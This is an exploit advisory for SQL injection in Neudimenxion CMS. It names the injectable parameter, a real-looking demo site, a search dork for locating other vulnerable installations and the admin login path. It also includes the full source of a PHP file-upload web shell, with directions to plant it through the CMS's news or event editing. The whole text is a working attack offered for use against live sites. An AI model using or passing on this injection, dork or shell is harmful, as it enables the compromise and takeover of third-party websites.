=========================================================
# Exploit Title : Neudimenxion CMS SQL Injection
# Date : 17 July 2011
# Author : Netrondoank aka netron
# Platform/Tested on: Linux
# myweb : http://www.ilmuhacker.org
# Version : none
# Software Link: : http://www.neudimenxion.com/
# dork : "CMS © Neudimenxion.com"
======================================================================
# vuln here
http://site/path/directories_detail.php?id=[sqli]
demo
http://wismasaberkas.com.my/web/directories_detail.php?id=1
Login Admin
http://site/admin_login.php
======================================================================
use this exploit for make upload.php
upload ure shell via edit news or via event or via tamper data
<?php
echo '<b>RI<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
======================================================================
[+] Spesial thanks to all friend @ site : IndonesianSecurity.info +
palembang Hackerlink + Blitar hackerlink + hacker newbie
[+ ]Kimmmonosz + Budi anja (biohazzard ) + Klicak + jos ali joe + Pokeng + Crashblack + nesta + andy_william